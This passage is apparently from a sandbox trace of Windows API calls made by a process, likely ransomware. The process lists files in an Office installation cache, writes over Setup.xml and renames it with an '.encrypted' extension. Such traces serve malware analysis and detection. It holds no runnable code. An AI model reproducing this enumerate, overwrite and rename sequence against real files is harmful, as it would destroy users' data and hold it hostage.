lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0229.257] GetFileType (hFile=0x280) returned 0x1 [0229.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0229.257] GetFileType (hFile=0x280) returned 0x1 [0229.258] WriteFile (in: hFile=0x280, lpBuffer=0x22ec4e8*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x22ec4e8*, lpNumberOfBytesWritten=0x2ee798*=0x5b0, lpOverlapped=0x0) returned 1 [0229.258] CloseHandle (hObject=0x280) returned 1 [0229.259] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0229.259] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0229.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0229.259] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x6e30dfe0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x5b0)) returned 1 [0229.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0229.259] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0229.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0229.260] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0229.260] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0229.260] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f0fb0 [0229.263] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0229.263] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0229.263] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0229.263] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0229.263] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0229.263] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1 [0229.263] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VC90.CRT.manifest", cAlternateFileName="MICROS~1.MAN")) returned 1 [0229.264] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1 [0229.264] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1 [0229.264] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1 [0229.264] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0229.264] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0229.264] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0229.265] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetupui.dll", cAlternateFileName="")) returned 1 [0229.265] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="pss10r.chm", cAlternateFileName="")) returned 1 [0229.265] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.chm", cAlternateFileName="")) returned 1 [0229.265] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0229.265] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1 [0229.266] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0229.266] FindClose (in: hFindFile=0x94f0fb0 | out: hFindFile=0x94f0fb0) returned 1 [0229.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0229.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0229.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0229.267] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0229.267] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0229.267] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f0fb0 [0229.268] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0229.268] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0229.268] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0229.268] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0229.268] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0229.269] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1 [0229.269] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VC90.CRT.manifest", cAlternateFileName="MICROS~1.MAN")) returned 1 [0229.269] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1 [0229.269] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1 [0229.269] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1 [0229.269] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0229.270] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0229.270] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0229.270] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetupui.dll", cAlternateFileName="")) returned 1 [0229.270] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="pss10r.chm", cAlternateFileName="")) returned 1 [0229.270] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.chm", cAlternateFileName="")) returned 1 [0229.271] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0229.271] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1 [0229.271] FindNextFileW (in: hFindFile=0x94f0fb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, 